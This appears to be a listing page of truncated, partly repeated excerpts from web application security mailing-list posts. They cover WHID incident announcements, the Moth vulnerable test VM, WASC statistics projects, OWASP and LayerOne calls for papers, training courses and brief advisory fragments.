Next Page >>
Web Application Security
The Web Hacking Incidents Database (http://whid.webappsec.org), or WHID for
short, is a Web Application Security Consortium (http://www.webappsec.org)
project dedicated to maintaining a list of web applications related security
incidents. WHID goal is to serve as a tool for raising awareness of the web
application security problem and provide information for statistical
analysis of web applications security incidents.
The following incidents where added to WHID last week:
* WHID 2009-19: Kaspersky site breached using SQL injection, sensitive data
List,
Moth is a VMware image with a set of vulnerable Web Applications and
scripts, that you may use for:
- Testing Web Application Security Scanners
- Testing Static Code Analysis tools (SCA)
- Giving an introductory course to Web Application Security
The motivation for creating this tool came after reading
"anantasec-report.pdf" which is included in the release file which you
- Starting and Managing Secure Development Lifecycle Programs
- Technology specific presentations on security such as AJAX, XML, etc
- Web Application Security countermeasures
- Web Application Security Testing
- Web Services, XML and Application Security
The Web Hacking Incidents Database (http://whid.webappsec.org), or WHID for
short, is a Web Application Security Consortium (http://www.webappsec.org)
project dedicated to maintaining a list of web applications related security
incidents. WHID goal is to serve as a tool for raising awareness of the web
application security problem and provide information for statistical
analysis of web applications security incidents.
To continuously learn about new incidents, subscribe to the WHID RSS at
http://whid.webappsec.org/whid/rss.
Following are the latest addition to the Web Hacking Incidents Database
(WHID), a Web Application Security Consortium project. For further
information about the incidents including reference to further
information about each incident, refer to WHID's site at
http://www.webappsec.org/projects/whid/
WHID 2007-48: MSU investigating hacking incident
Reported: 17 October 2007
The Web Application Security Consortium (WASC) is pleased to announce
the WASC Web Application Security Statistics Project 2008. This
initiative is a collaborative industry wide effort to pool together
sanitized website vulnerability data and to gain a better understanding
about the web application vulnerability landscape.
The statistics was compiled from web application security assessment
projects which were made by the following companies in 2008 (in
alphabetic order):
- OWASP Tools and Projects
- Privacy Concerns with Applications and Data Storage
- Secure Coding Practices (J2EE/.NET)
- Starting and Managing Secure Development Lifecycle Programs
- Technology specific presentations on security such as AJAX, XML, etc
- Web Application Security countermeasures
- Web Application Security Testing
- Web Services, XML and Application Security
- Anything else relating to OWASP and Application Security
Proposals on topics not listed above but related to the conference (i.e. which are related to Application Security) may also be accepted.
Andres Riancho wrote:
> List,
>
> Moth is a VMware image with a set of vulnerable Web Applications and
> scripts, that you may use for:
> - Testing Web Application Security Scanners
> - Testing Static Code Analysis tools (SCA)
> - Giving an introductory course to Web Application Security
>
> The motivation for creating this tool came after reading
> "anantasec-report.pdf" which is included in the release file which you
The Web Hacking Incidents Database (http://whid.webappsec.org), or WHID for
short, is a Web Application Security Consortium (http://www.webappsec.org)
project dedicated to maintaining a list of web applications related security
incidents. WHID goal is to serve as a tool for raising awareness of the web
application security problem and provide information for statistical
analysis of web applications security incidents.
The last week was very rich in Web Hacking Incidents. Too rich. The
following incidents where added to WHID last week:
(Sorry for the duplicate sending; links in the original post where broken)
The Web Hacking Incidents Database (http://whid.webappsec.org), or WHID for
short, is a Web Application Security Consortium (http://www.webappsec.org)
project dedicated to maintaining a list of web applications related security
incidents. WHID goal is to serve as a tool for raising awareness of the web
application security problem and provide information for statistical
analysis of web applications security incidents.
The following incidents where added to WHID last week:
The Web Application Security Consortium (WASC) is pleased to announce
the WASC Web Application Security Statistics Project 2007. This
initiative is a collaborative industry wide effort to pool together
sanitized website vulnerability data and to gain a better understanding
about the web application vulnerability landscape.
Goals
1. Identify the prevalence and probability of different vulnerability classes
Web applications should never trust on user generated input and therefore sanatize all input.
MajorSecurity
================
MajorSecurity is a German penetrationtesting and security research company which focuses
on web application security. We offer professional penetrationstest, security audits,
source code reviews and pci dss compliance tests.
Workaround
================
Do not browse untrusted sites or follow untrusted links while being logged-in to the application.
This issue covers following articles:-
0x00 Tech Gyan - Looking Into the Eye of the Bits
0x01 Tool Gyan - Ravan – JavaScript Distributed Computing System
0x02 Mom's Guide - Best Practices of Web Application Security
0x03 Legal Gyan - Law relating to Cyberterrorism
0x04 Matriux Vibhag - OWASP Mantra’s MoC Crawler
0x05 Poster - Ravan
Check http://chmag.in/ for articles.
speakers being announced regularly. We still have a few open slots
that we need to fill, so if you are interested in speaking at this
year’s event please submit a paper via our CFP address of ‘cfp <at>
layerone <dot> info’. Our current selection of speakers covers a wide
range of interests. We will have presentations covering such topics as
Web Application Security, GnuRadio, Lockpicking Forensics, Security
Consulting, and DNSSEC. Our speakers come from a wide variety of
backgrounds and are all subject matter experts in their respective
fields.
Pre-Registration has opened for this year’s event. The
TECH TRAINING 2 - Bluetooth, RFID & Wireless Hacking - UPDATED COURSE
CONTENTS!
Trainers: Andrew 'Q' Righter (HacDC) and King Tuna
Seats Left: 9
TECH TRAINING 3 - Web Application Security - Advanced Attacks and Defense
Trainer: Shreeraj Shah (Director, BlueInfy)
Seats Left: CLASS IS FULL
TECH TRAINING 4 - The Exploit Laboratory 3.0 - UPDATED COURSE CONTENTS!
Trainers: Saumil Shah (Founder/CEO, Net-Square) & SK Chong (Security
Web Application Security Consortium (www.webappsec.org) and SANS
(www.sans.org) has partnered together to define, train, test and certify the
individuals. WASC is a leading web application security organization and
SANS is a leader in training and certification. Together they have the
subject matter expertise and process expertise to make this a huge success.
We are doing a survey of the topics to be covered in the certification. We
request you to spare few minutes to take the survey.
For more details about the certification:
Product Description
---------------------------------------
Radware's AppWall is a Web application firewall (WAF) appliance that
secures Web applications. It enables PCI compliance by mitigating Web
application security threats and vulnerabilities to prevent data theft
and manipulation of sensitive corporate and customer information.
AppWall incorporates advanced, patent-protected Web application security
filtering technologies to seamlessly detect threats, block attacks and
report events.
[Source:
Impact: remote attacker can read arbitrary files on the target system
So, I was interested in e-book management software and after some research found
Calibre. It has useful feature - Content Server. Basically it's Webserver, based
on CherryPy, written in Python. As specialized in Web Application Security, then
obviously I spent some time playing with it.
I used Firefox with Live HTTP Headers Add-On, which provides easy way to observe
HTTP requests and responses. This is what got my attention:
http://localhost:8080/static/browse/browse.css
* Exploitation Techniques
* Rootkit Development
* Code Analysis
* Forensics and Anti-Forensics
* Embedded Device Security
* Web Application Security
* Network Traffic Analysis
* Wireless Network Security
* Cryptography and Cryptanalysis
* Social Engineering
* Law Enforcement Activities
o Exploitation Techniques
o Rootkit Development
o Code Analysis
o Forensics and Anti-Forensics
o Embedded Device Security
o Web Application Security
o Network Traffic Analysis
o Wireless Network Security
o Cryptography and Cryptanalysis
o Social Engineering
o Law Enforcement Activities
> of the stringent attacks.
> Well to be ethical in this regard these are not the recent attacks but
> are persisting from long time. The only
> difference is the exploitation ratio has increased from bottom to top.
> So that's the prime reason it has been
> included in the web application security benchmarks. But the
> projection
> of redirection attacks is active now.
>
> This post is not about explaining the basics of redirection issues. It
> is more about the design vulnerabilities
of the stringent attacks.
Well to be ethical in this regard these are not the recent attacks but
are persisting from long time. The only
difference is the exploitation ratio has increased from bottom to top.
So that's the prime reason it has been
included in the web application security benchmarks. But the projection
of redirection attacks is active now.
This post is not about explaining the basics of redirection issues. It
is more about the design vulnerabilities
in browsers that can lead to potential persistent redirection
Among services; Penetration Testing, Risk Assessments, Secure Code
Development and Guidance.
BugSec Solutions develops innovative products and tools which gives
focused solution to systems data security
issues, such as Web Application Security, Secure coding and
Anti-Phishing solution.
References
Deviant Ollam - 1 Day Course
\__Mastery of Physical Security
Joe McCray - 2 Day Course
\__Crash Course on Penetration Testing & Web Application Security
Jared DeMott - 3 Day Course
\__Application Security: For Hackers and Developers
Scott Lambert & Jason Geffner - 3 Day Course
On Wed, Oct 12, 2011 at 9:43 AM, AppSec DC <cfp@appsecdc.org> wrote:
>
> Colleagues,
>
> Building on the success of AppSec DC 2010 and 2009, OWASP is pleased to announce the next OWASP AppSec DC conference. The theme for this year's conference is "OWASP - Not just webapps anymore" to reflect the new and revised scope of OWASP to include all application security issues instead of focusing just on web application security.
>
> Owing to feedback from the past two years, and in alignment with the overall OWASP Conference mission, the AppSec DC Planners have decided to move the conference to April of 2012. This is in response to requests from a variety of our sponsors and vendors, and de-conflicts overlap in the OWASP conference schedule for North America. OWASP AppSec DC 2012 will be held at the Walter E. Washington Convention Center on April 2nd through April 5th. Plenary sessions will be on April 4th and 5th preceded by Application Security Training on April 2nd and 3rd.
>
> In accordance with the broader OWASP mission stemming from the 2011 OWASP Global Summit, AppSec DC is working to reflect the move of OWASP towards embracing all facets of Application Security, and not restricting it's content to strictly to the realm of web applications. Therefore we invite all practitioners of application security and those who work with or interact with all facets of application security to submit papers and participate in the conference.
>
o Exploitation Techniques
o Rootkit Development
o Code Analysis
o Forensics and Anti-Forensics
o Embedded Device Security
o Web Application Security
o Network Traffic Analysis
o Wireless Network Security
o Cryptography and Cryptanalysis
o Social Engineering
o Law Enforcement Activities
Building on the success of AppSec DC 2010 and 2009, OWASP is pleased
to announce the next OWASP AppSec DC conference. The theme for this
year's conference is "OWASP - Not just webapps anymore" to reflect the
new and revised scope of OWASP to include all application security
issues instead of focusing just on web application security.
Owing to feedback from the past two years, and in alignment with the
overall OWASP Conference mission, the AppSec DC Planners have decided
to move the conference to April of 2012. This is in response to
requests from a variety of our sponsors and vendors, and de-conflicts
Interested in Speaking at the event??
1. The topic of the event should be on "Privacy in the 21st Century", so all talks should be related to it (we should be addressing the Web Application side of Privacy (for example what happens to Privacy with SQL Injection, XSS and issues like pdp's Snoop)
2. All events are recommended to have the same panel discussion on the subject "What is the current state of Privacy on Web Application Security? and what should we be focusing on?").
3. Drop in a mail to dharmeshmm at mastek dot com to confirm your presentation.
o Exploitation Techniques
o Rootkit Development
o Code Analysis
o Forensics and Anti-Forensics
o Embedded Device Security
o Web Application Security
o Network Traffic Analysis
o Wireless Network Security
o Cryptography and Cryptanalysis
o Social Engineering
o Law Enforcement Activities
also be in attendance for portions of the class. So, if you ever wanted
a chance to learn more about ModSecurity and to pick the brain's of the
ModSecurity experts, this is your chance :)
In the true nature of open source, most of the proceedings from the
course goes to OWASP, the Open Web Application Security project, for
open source projects and activities promoting web application security.
For more details, a complete program and registration go to:
https://www.owasp.org/index.php/7th_OWASP_AppSec_Conference_-_San_Jose_2
007/Training
Next Page>>
|
